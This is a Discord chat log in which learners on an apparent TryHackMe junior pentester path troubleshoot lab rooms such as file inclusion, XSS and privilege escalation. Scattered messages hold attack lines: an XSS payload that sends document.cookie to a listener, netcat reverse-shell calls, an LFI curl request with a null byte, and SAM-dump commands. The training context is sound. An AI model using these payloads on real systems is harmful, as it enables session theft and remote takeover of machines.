#junior-pentester-path

1 messages Β· Page 30 of 1

tidal lake
#

i'm getting no error message on the task 8 playground question for the LFI room. On previous attempts I was able to get the error message saying it couldn't resolve hostname so i had to edit my python server to use the IP for the VPN connection but now the page just returns without an error. can someone point me in another direction for troubleshooting?

tidal lake
#

replace cmd.php with hostname.txt

#

i tried different file types and names. they both have the same content.

#

it's not even making a request out to the python server

#

yeah that's my openvpn popup

#

the attack box?

#

the VM that THM provides

#

i'm not

#

i'm on my pc

#

i'm not running a VM

#

its not running on all interfaces

#

at the very least

idle bison
#

If they're getting the gets then something is going right WRT NAT

idle bison
tidal lake
tidal lake
#

if this works in the thm attackbox im gonna scream

tidal lake
# idle bison It will

it's going to frustrate me to no end that i don't understand why it's not working from my end

idle bison
#

Probably firewalls etc

#

Usual setup is a Kali VM, run the VPN directly in the VM

uncut stone
#

Hi Guys

#

which wardriving Site would u recommend?

uncut stone
#

Hi Guys, is the Path "Offensive Pentesting" current or obsolete or replaced by "Jr. Pentesting"?

sage current
uncut stone
#

alright, thank you my shadow πŸ™‚

idle bison
final bramble
#

For Task 11 of the "Linux PrivEsc" room - the target machine isn't able to execute the compiled C program. Is this intentional? I keep getting an 'exec format error'

idle bison
#

Did you compile it on your own machine?

final bramble
idle bison
#

Is your own machine ARM?

final bramble
#

omg yes

#

facepalm

idle bison
#

Cross compilation is a pain in the ass for a lot of setups, as a warning

final bramble
#

gotcha thanks - completely slipped my mind

final bramble
next lanceBOT
#

Gave +1 Rep to @idle bison

abstract heart
#

I can't get task 6 (Metasploit Exploitation) to accept the hash for the second user??

rustic totem
abstract heart
#

I'll drop the whole line as well as what I expect it should accept (even though I've tried pretty much any combination I could think of)

#

||claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002:1002::||

#

||SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002||

abstract heart
idle bison
abstract heart
flint owl
#

Breaking my head on Subdomain Enumeration Task 6. Virtual Hosts

#

Anyone know what the MACHINE_IP is? like where am I pulling that value from

ember yarrow
#

You need to press "Start Machine"

#

Go through the tasks until you find the correct one to start

#

If a room has multiple machines then each task might have a different machine

flint owl
#

I terminated my last one and started new one in task 6

#

it either pulls nothing or a zillion names, but none are the answers

#

am I supposed to be using the AttackBox IP for MACHINE_IP?

ember yarrow
#

The deployable machine

idle bison
flint owl
#

hum

#

Okay, I'll terminate and try again

#

Thanks!

idle bison
# flint owl Okay, I'll terminate and try again

Remember the definition of insanity is doing the same thing over and over again. Makw sure you're deploying the machine with the button in the top right of a task, not the start attackbox button.

flint owl
#

Hitting Start Machine just says its started...and gives me no option to view it

#

am I then supposed to do Start Attackbox?

sage current
flint owl
#

That seems to be it

#

Weirdly confusing, but now I get it

#

Thanks for the assist!

flint owl
#

the mysteries are revealed

#

I thought I was going insane xD

idle bison
flint owl
#

speaking of that, I'm unclear on what's going on with accessing stuff. via OpenVPN. Is it meant to let me do the lessons in my own terminal?

#

or is my only option attackbox or Kali

idle bison
#

Yeah you can use the VPN to comnect to the network

modest arch
#

Anyone knows ho i can bypays slash sanitization

#

?

earnest flower
rustic totem
earnest flower
earnest flower
gentle belfry
#

Using the curl command

#

Yes in attackbox, yes i am a subscriber

shadow echo
uncut stone
#

Hi guys

#

nmap: can someone explain to me what -sC does exactly? I understand that this applies nmap's default scripts to the respective ports, but what kind of scripts are these or what is the purpose of the default scripts?

#

yes

#

but somehow I don't get any smarter from it ^^

#

ok these are the respective scripts. And these are all executed, correct?

#

you mean RTFM? πŸ˜„

#

thanks, i will do more research. I wonder if by enabling -sC then the other scan types are not used like TCP SYN Scan. I guess I didn't describe my question well

#

I'd better do some research.

shadow echo
#

Are you adding the 16541 to your search?
As I assume that's just the speed specification of curl

gentle belfry
#

Yes i was adding, should i remove that?

shadow echo
gentle belfry
#

Yes you are right, omitting that i find the hash value. Many thanks

shadow echo
#

If you could maybe consider to delete that message or put it in spoiler, so others have to do it on their own, would be great πŸ™‚

gentle belfry
#

Sure, deleted. Thanks

modest arch
#

Can someone explain me what this meterpreter, I googled it but I’m confused

earnest flower
placid heath
idle bison
remote iris
#

Attack shell?

#

Not shell.

#

Payload

hybrid torrent
#

Why cant i get 500 Internal Server Error in burp suite repeater room. I'm changing everything in repeater! just cant seem to get it 😩

shadow echo
flint owl
#

I have a super newbie question about File Inclusion. Task 4: Local File Inclusion - LFI. I can't figure out the path for question 1 which is "try to read /etc/passwd. What would the request URI be?"

#

It doesn't seem to be something like "lab1.php?lang=/etc/passwd"

#

Hint or examples confounding me maybe, idk. Any tips would be appreciated, cheers.

#

Okay, it worked in the answer but not in the lab. Weird

shadow echo
#

!docs verify

tiny bluffBOT
flint owl
#

I think it was actually working I just failed to realize it, since the preview was a bunch of gibberish. I mistook is an error

#

@shadow echo I am blanking on the RFI playground though.

#

I love THM. But the "one forum for all tasks" thing is hella confusing to read xD

shadow echo
flint owl
#

Oh I mean the File Inclusion Lab Playground

shadow echo
#

Also, the "one forum for all tasks" ?

flint owl
#

Oh, as in, it just says "go do something" but following the examples I can't get it to work

flint owl
shadow echo
flint owl
#

Yeah

shadow echo
#

But, if you verify your THM profile here in discord, you are able to send screenshots to show what exactly you are stuck with, which makes it much easier to help, thus people most likely reply to your question πŸ™‚

flint owl
#

Oh. I didn't see a verify

shadow echo
#

!docs verify

tiny bluffBOT
flint owl
#

There we go

#

Appreciate it

#

You sent earlier and I missed it. Sorry

shadow echo
flint owl
#

Here, I am following the examples to no effect. Do I have to create a cmd.txt file in attackbox? or on my local machine even?

shadow echo
flint owl
#

right

shadow echo
#

So if you are using the attackbox as your attacking machine and not your own local machine, I suggest doing it on the attackbox

#

Otherwise on your own machine

flint owl
#

thanks

shadow echo
flint owl
#

Haha, yeah I skipped that and am doing Challenge 1

#

about the POST request with the form

shadow echo
#

Oh, okay πŸ™‚

flint owl
#

I have changed the method to POST and am testing resending

#

muahaha, I figured it out

#

this is fun

quick heron
#

Hello

flint owl
#

Stuck on capturing flag 3 for Task 8 of LFI. I managed the other 2. The hint isn't really helping me, or the forum. Any suggestions here? Cheers

sage current
flint owl
#

I think I tried that but messed it up so got off course

#

seems like I had the right idea, but wrong implementation

#

cheers

sage current
#

good luck and hope you get it soon

flint owl
#

I believe my issue was not doing it right in burpsuite

#

but I got it via terminal

sage current
#

oh yeah using curl for it should work nicely too

flint owl
#

|| curl -X POST THMIPGOESHERE/challenges/chall3.php -d 'method=POST&file=/etc/flag3%00' --output - ||

mystic plume
#

you can also use postman installed on machine

flint owl
#

i haven't been using attack box

#

just openvpn

mystic plume
#

I am not really good with curl but this request seems wrong to me, when you use post you usually want to have body

flint owl
#

haha, well it works and shows the required answer

#

I believe --output - is doing it, body is showing

flint owl
#

i did no burps training lol, i think this is part of my issue

sage current
#

also learning how to use curl is really helpful for a lot of website messing around

flint owl
#

so the whole reload/send/forward/proxy etc sometimes is off a step

#

I prefer terminal to burps, but i realize I should use both..

flint owl
next lanceBOT
#

Gave +1 Rep to @mystic plume

mystic plume
#

@flint owl are you sure you got your answer ? Because you need to read file that is in /etc/flag3 but you are not located in the root (/)

#

Postman is basically interface for curl, it can also give you curl command, I find it more user friendly, but I guess at the end of the day curl is better

sage current
flint owl
#

Yes, I got the right answer in THM answer field

flint owl
#

it works both ways, with or without

#

so the directory traversal isn't required i guess here

mystic plume
#

Strange thought the point of chall was to show how to move and read content of files guess the other challs demonstrated that

flint owl
#

yes

sage current
mystic plume
#

I just didn't figure it out when I was doing it lol

sage current
#

not like the ../ tend to hurt things Β―_(ツ)_/Β―

azure wolf
#

Principles of Security room, Task 4, Questions 2 & 4, the answer should be Biba but was rejected

shadow echo
azure wolf
#

Ah. My bad

noble ether
#

yo guys idk if this the right channel to ask this but anyone know a really good course for learning OWASP TOP 10 ?

idle bison
noble ether
#

is there a link to it in tryhackme ?

idle bison
noble ether
next lanceBOT
#

Gave +1 Rep to @idle bison

idle bison
#

@heavy night Can you see what I mean about people only thinking there's the path content and nothing more?

noble ether
#

yea i thought there is only path content but not actual teaching i did take a course from collage in my country but i wanted to go through owasp top 10 since its been a while i kinda dont remember most of stuff i will check this thanks again

modest arch
#

how the hell can i copy stuff out of nano

maiden stratus
#

By googling how to πŸ™‚

modest arch
#

i mean i did it exactly like google said

#

alt a

#

alt 6

#

and pasting with strg u

#

if i use strg u here

#

it just opens thatthe source code

#

incredible really wasting an hour on how to copy and paste some stuff in linux...

misty sonnet
#

loading the website running on the machine in my task is very slow to load into

#

i have the vpn on and for some reason it has always been slow

#

machine is running

#

and im connected

#

but it takes forever to load

#

it loads eventually but thm will ask me to go to a different page or reload the page in some way and it takes forever to get through any box that asks me to do this

#

seems to only happen on the learning courses though as practice boxes with a site run perfectly fine

sacred scroll
#

Which rooms or path should I do following jr pentester

earnest flower
#

Why that order when the PenTest+ path is rated as easy while the Jr PT path is intermediate?

remote iris
#

Right click?

#

Or for paste, clicking the middle wheel

sage current
earnest flower
#

Gotcha.

rustic totem
heavy night
next lanceBOT
#

Gave +1 Rep to @idle bison

heavy night
#

Did you have any ideas on how we can better show users path progression?

idle bison
#

It's whether they know that there's more on THM, beyond just the paths

misty sonnet
modest arch
sage current
#

making it hard to learn from it to a decent degree

misty sonnet
modest arch
sage current
#

or maybe they will just update it heavily but then shadow dunno why they made new paths to kinda replace it

modest arch
#

@misty sonnet not sure that it was πŸ€”

@sage current interesting. Thanks for your feedback

next lanceBOT
#

Gave +1 Rep to @misty sonnet

sage current
#

no problem

gentle belfry
#

Under "Junior Pentester Path"-> "Authentication Bypass"->"Username Enumeration" there are questions stating "what is the username starting with si. After running the ffuf, i only got one username. Is the expectation to open the names.txt file and try gving all the usernames which starts with "si". This is a huge list and its like trial and error. Please let know if this is the method to be followed

tiny bluffBOT
placid glade
#

Hello, I'm getting the below on the console that runs openvpn and when this happens, my connection stops.

TLS Error: Unroutable control packet received from [AF_INET]18.202.129.195:1194 (si=3 op=P_CONTROL_V1)

Any advice?

uncut cape
#

Please is it advisable to have Kali as a standalone os instead of having both windows and Kali installed on different partitions?

uncut cape
#

Thanks @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Hi guys

#

got that screen on my browser attack box

#

linprivesc room

#

thought it was a bug

#

bc that appeared instead of the attack box

#

closed attack box and started it again. it works now

modest arch
#

Hi guys

#

im right now stuck here

#

ive got the explot and compiled it and startet a http server on my machine

#

everythime i try to wget from target machine

#

i get the error below

#

thats the permission set

#

dont understand, why it needs write permission?

shadow echo
earnest flower
icy pike
#

How do I get permission to upload images here? I am stuck with something and I wanted to share the screenshot

#

NVM Got it

novel zealot
#

Fuuuug I just finished the Windows room two days ago and they revamped it 😭 You already know what I gotta do

ruby epoch
#

I guess, at least, it's good repetition πŸ˜‚

somber raft
#

not sure what I'm doing wrong on task 8 RCE. I'm serving the file and tried using both GET and POST method in burp but I'm getting a weird error

somber raft
#

is there something wrong with this? <?PHP print exec('hostname'): ?>

#

I tried removing the ":" but then the request just loads forever

grave python
#

hello guys can someone help me with the windows privesc room?
im in task 5 and im trying to swap the executable of a service with a msfvenom payload that i already moved to the target machine but i cant seem to get the reverse shell to my nc listener...
i did:
cd C:\PROGRA~2\SYSTEM~1\ ## to move to the service executable directory
move WService.exe WService.exe.bkp ## to change the name of the original executble
move C:\Users\thm-unpriv\rev-svc.exe WService.exe ## to move the msfvenom payload to the directory and changing its name to WService.exe
icacls WService.exe /grant Everyone:F ## to grant the everyone group full permissions

then i stopped the service with "sc stop windowsscheduler" and i opened the nc listener and started the service again with "sc start windowsscheduler"

native matrix
#

Hello

#

I am stuck on content Discovery task 12 (can some one tell me acme IT URL ?)

shadow echo
native matrix
next lanceBOT
#

Gave +1 Rep to @shadow echo

native matrix
#

any hint ?

obtuse copper
#

hello

#

anyone here atall

#

i could use some help

#

please

shadow echo
native matrix
idle bison
shadow echo
native matrix
shadow echo
#

!docs verify

tiny bluffBOT
native matrix
obtuse copper
#

hello guys have stuck in task 3 upward i think theres a problem with the attach lab each time i try using power shell it get freeze up[7:04 PM]what can i do[7:05 PM]or is there anything im missing[7:05 PM]i really will appreciate some help as this is the last step of the whole session

#

i really would appreciate not sure what else to do helpppppppppp

#

Jnr Pentester:WINDOWS PRIVILEGE EXCALATION

modest arch
#

Hi everyone.
I cant get the reverse shell in task7 Windows Privilege Escalation room.can anyone please guide me and help with the payload

obtuse copper
#

I’m having the same problem with task 4 I can’t get a reverse shell how do you sort that @modest arch

#

Please

quiet musk
#

Having some trouble figuring out how to get the user passwords in Linux PrivEsc. I managed to get the answers by guessing, but I would like to know how to actually do it.

I have root access, and used cat on both /etc/shadow and /etc/passwd. I copied their contents into files on my machine, ran unshadow on them, and tried to use John the Ripper with rockyou.txt. I've tried to do it both with the full shadow/passwd, and with everything but the "matt" line removed (for task 9). It will do like a hundred cracks, then just stop without a result, as shown below.

#

I don't know if I'm using John incorrectly or if there is something I'm missing? But it's really bothering me

shadow echo
quiet musk
#

A lot of my problems seem to stem from doing them on my own machine rather than using the attackbox, so that's probably the issue. Just not sure why it does that, since it should in theory be the same

obtuse copper
#

You need to be able to get your hands on it or know what’s been done it’s not all about the answers my dear friend

#

Except you are doing the right thing but having some technical issue then I don’t see why you should get the above

idle bison
#

That would be cheating, please do not ask for answers

obtuse copper
#

Hello good morning my dear friends I know the time zone is different for anybody but I could make use of some help in task task 5 of the new window privilege to escalation room, have done all the right thing but each time I try to download my payload from Kali to windows powershell in task 5 it keeps failing and displaying this I’m I missing anything or can anyone kind of let me know what I’m suppose to be doing and I’m not. @idle bison @willow nova

idle bison
#

Please don't ping people to request help

obtuse copper
#

Okay thanks

idle bison
#

Mods are not support staff, and support staff do not provide support through discord

obsidian bluff
#

kk

obtuse copper
#

@idle bison don’t take it too personal if you can’t help just say it….. it’s that simple a lil hint here and there would go a long way not like I’m even asking for the answers…

idle bison
#

Don't do that.

#

It's rude.

obtuse copper
#

Yessirrrrrrr

obtuse copper
#

Hey I’m having same problem in task 5 it won’t let me download the payload from Linux(after hosting my http.server)into powershell(windows)even tho I’m doing the right thing , do you have a hint and I’m thinking maybe something wrong with the lab?

#

It won’t let me send picture here so I sent it to your dm my dear friend it’s okay if you can just check it, not so important you reply or anything

boreal jewel
#

Hello peopleeee, I'm working on the Windows Priv Esc room, Abusing dangerous privilege section.
Executing smbserver.py gives me a traceback error

Exception: Version mismatch: this is the 'cffi' package version 1.14.2, located in '/usr/local/lib/python3.6/dist-packages/cffi/api.py'. When we import the top-level '_cffi_backend' extension module, we get version 1.11.5, located in '/usr/lib/python3/dist-packages/_cffi_backend.cpython-36m-x86_64-linux-gnu.so'. The two versions should be equal; check your installation.

and I cant run sudo apt-update on the attackbox. Any help?

tiny bluffBOT
delicate tide
idle bison
boreal jewel
#

THank you. I should have looked thre first, Been staring at the screen all night lol

tawdry forum
#

Hi All, I posted this somewhere else, but maybe here is more appropriate. Could somebody take a look at my shell for the Linux PrivEsc: Crontab section? can't seem to catch it and everything seems to be in order from here

idle bison
tawdry forum
#

its a currently existing cronjob that executes once per minute from the home directory, so i'm guessing no issues with that. will double check ,thanks

#

legend

idle bison
tawdry forum
next lanceBOT
#

Gave +1 Rep to @idle bison

idle bison
#

By the way if you verify, you'll get permission to send images here

#

!docs verify

tiny bluffBOT
tawdry forum
#

oh i was wondering about that. thanks

idle bison
#

Happy hacking!

tawdry forum
gleaming edge
#

Hi, I'm doing wind privesc Task 7. I'm following every step right but I'm geting admin priv.

#

not*

quick heron
#

Hello, what you guys do went IP is not showing ?

#

In the task Instead IP , I see MACHINE_IP

remote iris
#

You need to start the machine.

#

green button

earnest flower
south olive
#

Hi, I need guide related to burp suite decoder::task4, I downloaded 4 keys tried encoding with MD5 then MD5 hash to ASCII- Text but for all 4 keys couldn't get the same provided MD5 hashsum. Anyone please help me to solve it.

placid glade
#

Hello all,
I'm going through the Jr. Pentester path. I'm at the last stage of the XSS where I'm supposed to send the cookie back to me using:

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

I'm swapping {URL_OR_IP} for my IP within the VPN together with the port 9001 ( IP:PORT) in a way that would like ( not putting my IP, just an example )

</textarea><script>fetch('http://10.10.10.10:9001?cookie=' + btoa(document.cookie) );</script>

On the side i have netcat listening on the port 9001. But when i open the ticket created, i don't get anything back

earnest flower
#

I just went through that module yesterday and made the same mistake.

earnest flower
sharp crown
#

Hello Guys Active Reconnaissance Lab from Junior Pentester Path, cannot connect through telnet

#

it says Connection closed by foreign host.

#

any help?

#

I'm using the Attackbox

kindred mason
#

somoene can help me plz on Windows Privilege Escalation task 4 ?

placid glade
kindred mason
#

i cant have the reverse shell by the schtasks but it s write that "SUCCESS: Attempted to run the scheduled task "vulntask"." and the code is ok ....

south olive
placid glade
next lanceBOT
#

Gave +1 Rep to @idle bison

lapis zealot
#

Yo

fluid pine
#

hello I am trying to scan some target machines in the room Nmap Advanced Port Scans however when it asks me how many ports are unfiltered I cannot find any even though after I change the agressiveness

#

Is there something I am missing or is there a problem with the room since I didn't have this problem in different rooms or same room different task

true echo
#

Hi, are you using the FIN scan or the NULL scan? And are you scanning all ports?

tawdry forum
#

Hi Gang. I'm doing the last task in Windows PrivEsc and I'm a little confused about the payload.
It's dll hijacking, and i can see where I should be getting the payload to execute and everything, but how am i supposed to know which port to use? (they have provided a payload with the attackbox)

I can make my own payload and do it that way, but this has me thinking maybe i'm confused.

fluid pine
true echo
#

you can terminate and initiate again the VM, may be something was not correctly set (it had happened to me).

#

or you could try to issue the same command from the Attack box. I have just tried it and it worked

tawdry forum
#

so, is there a way of checking if my payload is erroring out? currently I have
("C:\tools\nc64.exe -nv 7420 -e cmd.exe")

can i just add '> output.txt' or will that mess up the nc connection?

#

its for the dll hijacking. for context, this initial example payload worked fine, so im guessing the dll is compiled correctly

maiden stratus
tawdry forum
#

double slashes? yes i have ip in there, sorry i forgot to write above.
oh shit, like C:\ \tools\nc64.exe ... ?

maiden stratus
#

C:\\tools\\nc64.exe 10.10.10.10 1234 -e cmd

tawdry forum
#

always something so simple huh

#

why is that? just a windows thing?

maiden stratus
#

the double slashes? you have to escape them, cuz the're used for stuff \n(new line) and such

tawdry forum
next lanceBOT
#

Gave +1 Rep to @maiden stratus

radiant sleet
#

Jr pentest pathway, windows privilege escalation, task 6 (Abusing dangerous privileges):
When every I run:

/opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

I get the following error:

Traceback (most recent call last):
File "/opt/impacket/examples/secretsdump.py", line 61, in <module>
from impacket.examples.utils import parse_target
ModuleNotFoundError: No module named 'impacket.examples.utils'

I have tried just about everything I could find online but if anyone else ran into this problem and knows a fix I am all ears.

#

also I have been using the thm attackbox. I tried a few times on Kali but still wasnt able to figure it out.

sage current
#

are you sure the script is in that folder???

radiant sleet
#

Yes. Thats the path that they say to use one thm as well.

#

Ive tried downloading the utils.py from githhub but it still says that same error

idle bison
#

You need impacket properly installed

radiant sleet
#

I believe I tried that by following the github page but it didnt work. do you remember how you did it?

idle bison
#

Yeah, either a proper install with pip or github, or settle for the likely older version in Kali repos

#

If you're having trouble, use the attackbox

sage current
#

well they already tried the attackbox above it seems and that did not work

radiant sleet
#

I did. I think I might try it on kali later. I found some install instructions for it. ill keep you posted.

earnest flower
radiant sleet
# earnest flower I'm tackling this room tonight, so if I work through it, I'll ping ya.

so I did the following to get the secretsdump.py working

from ~ directory:

git clone https://github.com/SecureAuthCorp/impacket.git


cd impacket

    sudo apt install python3 python3-pip

    sudo -H pip3 install --upgrade pip

    sudo python3 setup.py install

    pip3 install -r requirements.txt

    /usr/bin/python3 -m pip install --upgrade pip

    python3 -m pip install .

I have no doubt some of those are redundant but that's what I did. I now, however, can not get the psexec.py to work properly

#

and instead of using the path they say on thm, I used:

/root/impacket/examples/<pythonfile>

while in the "share" directory where the sam.hive and system.hive were located.

random ibex
#

So is burp suite like a nice all in one tool?

maiden stratus
#

for web-based stuff, yeh but you need to pay(~$350) for the pro version to be able to properly use intruder and the scanner and a bunch of it's plugins :/

random ibex
#

So that’s more for professionals and people who have their organizations able to sponsor that sort of software

south olive
#

Why I'm not getting MAC address in Null Scan.

#

Like here :

#

is it due to version change or what? Anyone please guide. Where I'm mistaking

#

Yes It is.

#

Nmap Advanced port scanning

#

What's wrong

#

Host is up

#

I tried with -PR -sn, But still the same.

idle bison
#

Attackbox would be on same layer2, VPN is tun rather than tap so only layer 3?

south olive
#

Yeah maybe. But is there any tag to get MAC address outside the network?

idle bison
#

Due to encapsulation, you can't see that info

south olive
#

Ohh Okay.

#

Thanks for reminding.

#

Got it.

sick knoll
#

Hey people, I am working on the Windows PrivEsc room in this path and I can't figure out why my RevShells get deleted by the Anti Virus (Yesterday it wasn't happening) any idea why? Okayge

sick knoll
#

nvm I managed to fix it FeelsOkayMan

modest arch
#

Jr pentest pathway, windows privilege escalation, task 7. could somebody give me a hint please. After I start the modify/repair function on the VNC Server, I cannot locate the vncserver-old.exe file it is not in the Temp folder of the user. Thanks for any help

modest arch
#

Hi everyone. πŸ™‚ After doing the nmap rooms in the network security section, one question remains: if nmap runs a tcp syn scan by default, in which scenario world one use the -sS flag?

earnest flower
modest arch
#

It’s a question that came up by reading the nmap rooms. Wrong place to ask?

sage current
#

also specifiying to use a specific scan type make it clearer what happens in writeups and documentation

modest arch
#

Ok, makes sense… Thanks! πŸ™

topaz river
#

can I get help with this task in the new "windows privilege escalation" room

the task exploit a vulnerability in RealVNC 6.8.0 using created malicious .dll file and then after following the steps of creating the .dll file he asked me to change the payload that exists in the script to perform a reverse shell but it doesn't work for me .
appreciate any help.

earnest flower
topaz river
#

yes

earnest flower
#

So you know it runs whatever line of code that is, so replace that with the reverse shell.

#

As it notes, nc.exe is already on the machine.

woven pewter
woven pewter
topaz river
#

I'm now trying this payload:
system("C:\tools\nc64.exe ATTACKER_IP 4444 -e cmd.exe");

woven pewter
#

yep just pay attention to the syntax and how many backslashes are used, compare it to the original formatting in the notes for that step:

topaz river
#

okay I'll try this payload : system("C:\\tools\\nc64.exe ATTACKER_IP 4444 -e cmd.exe");

south olive
#

Hello Friends, I have a question can't we detect OS using OpenVPN. Because I'm not getting OS info using OpenVPN. It's only detecting OS with AttackBox

#

Is it due to number of hops or THM security check.

earnest flower
#

Does wgetting the dll for the last flag of the Windows privesc room corrupt the file or something? I managed to get the flag bringing it over via SMB, but from two clean runs, I couldn't get the output.txt file to show wgetting the file from my box to the target.

#

It's possible I screwed up the compilation process I suppose, but it went weirdly smoothly when I changed tacks.

woven pewter
earnest flower
woven pewter
topaz river
#

Finally I did it !!

#

The mistake I did is that I was copying the wrong .dll file to the share
the wrong file name is : adsldp.dll
the true file name is : adsldpc.dll

#

Thanks for your help @woven pewter

next lanceBOT
#

Gave +1 Rep to @woven pewter

woven pewter
#

no problem πŸ™‚

glossy root
#

I've a question. I'm at Subdomain Enumeration task 6.
There is this:

user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.12.146 -fs {size}
This command has a similar syntax to the first apart from the -fs switch, which tells ffuf to ignore any results that are of the specified size.

The above command should have revealed two positive results that we haven't come across before.

Answer the questions below
What is the first subdomain discovered?


I know the answer but what is the goal of this task? What can I do with that subdomain because: "<answer>.FUZZ.acmeitsupport.thm" site doesnt work

shadow echo
glossy root
#

My answer is correct but the link doesn't work. That's not a problem because I understand the meaning

#

Thanks

shadow echo
glossy root
#

Ah it has to be added to my hostsfile ofcourse

fresh lagoon
#

I'm in the Vulnerability Capstone room, and I'm at my wit's end. I'm using the exploit.py script and following all the directions in all of the walkthroughs I've come across dutifully. This includes setting up a Netcat listener. Yet every time, the exploit.py shell_me command returns "No result." I've tried different port numbers. I even tried launching a new VM. Nothing is working, and I'm starting to wonder if this is a flaw in this room.

sage current
#

all the others don't seem to work now for some reason

fresh lagoon
sage current
#

???

#

could you verify and send a picture of what it is outputting please???

#

!docs verify

tiny bluffBOT
fresh lagoon
next lanceBOT
#

Gave +1 Rep to @sage current

fresh lagoon
#

As you can see, trying different port numbers does nothing.

sage current
#

do you have nc -lnvp 5345 running in the other tab???

fresh lagoon
#

Yes I do!

#

I've tried starting the listener both before and after running exploit.py. It doesn't matter. I still get "No result," each and every time.

shadow echo
fresh lagoon
#

AHA

#

THANK YOU so much!

sage current
#

sorry got busy with other stuff but luckly fontaene could answer with the same thingy shadow was about too

fresh lagoon
#

I'm so happy I completed this room. I struggled with it on Saturday evening, before I left for a holiday. I completed it sitting here in an Airbnb. On to Metasploit!

modest arch
#

Hi everyone. πŸ™‚ I'm in the 'What the shell' room in task 13 'Practice and examples', question 'Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell'. I can connect to the target machine using RDP, I created a php file on my system as explained in task 11, uploaded it to the Windows server on the target machine. Then I browse to the file to execute it and as a parameter, I am passing the Powershell command from task 8, with my IP and port, URL encoded. I have a listener active on my system. But I get an 'Access forbidden' error sent back by the web page. And the listener isn't getting a connection. Any idea what I'm doing wrong ?

lucid cliff
#

OK, I'm on the LFI Challenges, and on the second box, I figured out how to escalate using the cookie, but when I try any php entries, nothing gets returned.

#

and... I thought about it for like 10 seconds after posting and I think I have a solution

#

nah, thought I had it, dang it

lucid cliff
#

OMG, I got it!

#

So fun!

#

Oof, stuck on 3 though

lucid cliff
#

And 4, I can get it to run echo commands and make it say whatever I want, but if I run hostname, there's no output

#

sigh

#

Guess I'll try again tomorrow!

lucid cliff
#

<insert banging head into wall meme here>

open musk
#

Hey Guys!
I'm facing some issues with the "Basic Penetration Testing | John Hammond" room.

I'm trying to scan the machine with VPN, but there is the error with ignored states ports.

The VPN diag is fine.


         _____           _   _            _    __  __
        |_   _| __ _   _| | | | __ _  ___| | _|  \/  | ___                                           
          | || '__| | | | |_| |/ _` |/ __| |/ / |\/| |/ _ \                                          
          | || |  | |_| |  _  | (_| | (__|   <| |  | |  __/                                          
          |_||_|   \__, |_| |_|\__,_|\___|_|\_\_|  |_|\___|                                          
                   |___/                                                                             
                                                                                                     
                                                @MuirlandOracle                                      


[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[+] Connectivity checks completed!
[+] You are connected to the TryHackMe Network
Your TryHackMe IP address is: 10.6.36.104

Happy Hacking!

                                                                                                     
β”Œβ”€β”€(kaliγ‰Ώkali)-[~/thm]
└─$ sudo nmap -sC -sV -oN nmap/initial 10.6.36.104                
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 11:31 EDT
Nmap scan report for 10.6.36.104
Host is up (0.0000040s latency).
All 1000 scanned ports on 10.6.36.104 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
remote iris
#

The IP looks wrong?

remote iris
remote iris
#

No, that's YOUR tun0 IP

#

You need to start the machine in the room

#

@open musk

open musk
#

Oh, my bad man.
Thank you for your help!!!!

lucid cliff
#

I'm happy to report, I got both flags after knocking myself unconscious (and reading some forum posts)

uncut stone
#

Hi Guys

#

I have specified port 80. Why are other ports scanned when I explicitly specified -PS80?

#

sure, its an TCP Syn Ping Scan

#

yes, i want just tcp-syn scan only Port 80

#

no

#

because i just want do a tcp syn ping scan

#

there is a different between -sS (TCP Syn Scan) and -PS (TCP Syn Ping Scan)

#

am i misunderstanding something? πŸ˜„

sage current
shadow echo
uncut stone
#

u are right!

#

thanks!

earnest flower
idle bison
#

Then it will scan any hosts that it finds as "up"

uncut stone
idle bison
#

So if you just want host discovery and no scan, you'll need to explicitly state that as shadow and fontaene said

uncut stone
#

yes, it works

#

thanks

idle bison
#

The nmap documentation is absolutely excellent

uncut stone
#

What I'm saying is that the doc is very good, THM is very good, and the THM discord is also very good. Thanks for fast feedback πŸ™‚

lucid cliff
#

@earnest flower I have a question for you, did you have your own framework (Kali for example) for the eJPT... you don't get access to a virtual machine or anything for it right? just an OpenVPN connection?

south olive
earnest flower
#

While the exam itself requires your own system.

lucid cliff
#

Cool, thanks for the response! I gathered as much, just wanted to confirm!!

#

Yeah, I'd have Kali spun up on a VM

edgy berry
#

how can I know if a website set a new cookies from devtools?

lucid cliff
#

Depends on the browser you are using.... In the Chrome console it's under application -> cookies, and I think on Firefox it's under the Storage tab

earnest flower
lucid cliff
#

I think I'm a ways off, but it's probably just imposter syndrome lol... I literally used to be on a red team, but that was a few years back, just getting back into it now (although being a network and security engineer helps keep me fresh on some things)... Plan was to do the Jr Pen Test course here, run a few HTB stuff, then do the INE coursework and then take the test... That's probably overkill, but I like to be prepared... Then I'm going to work towards Pen+ and then (big gulp) OSCP next year... Always been a goal of mine

earnest flower
#

But I'm taking the CySA+ this weekend and then starting the PEN-200 Sunday, so we'll see how it all compares!

lucid cliff
#

Nice, I have Sec+ and like 14 years related experience lol, so we'll see... I'm trying to get the eJPT and Pen+ by November because I have a notional job opportunity... Then OSCP within a year

earnest flower
#

Bro, with that much experience, you should be able to get through all that well before then. You saw the resources I linked for the PT+?

lucid cliff
#

No? Can you please point me in that direction? I just saw you had eJPT as a role lol

earnest flower
#

The PenTest+ path on THM plus Jason Dion's Udemy course for the exam. It's got the lectures for both the retired 001 and the 002.

#

Mind if I shoot you a friend request? You're welcome to dm me with more questions whenever.

#

And I would contend that their both about the same level of difficulty, with one showing a more technical focus and one more knowledge based.

lucid cliff
#

Nice, yeah that would be great!

uncut stone
next lanceBOT
#

Gave +1 Rep to @south olive

hardy lagoon
#

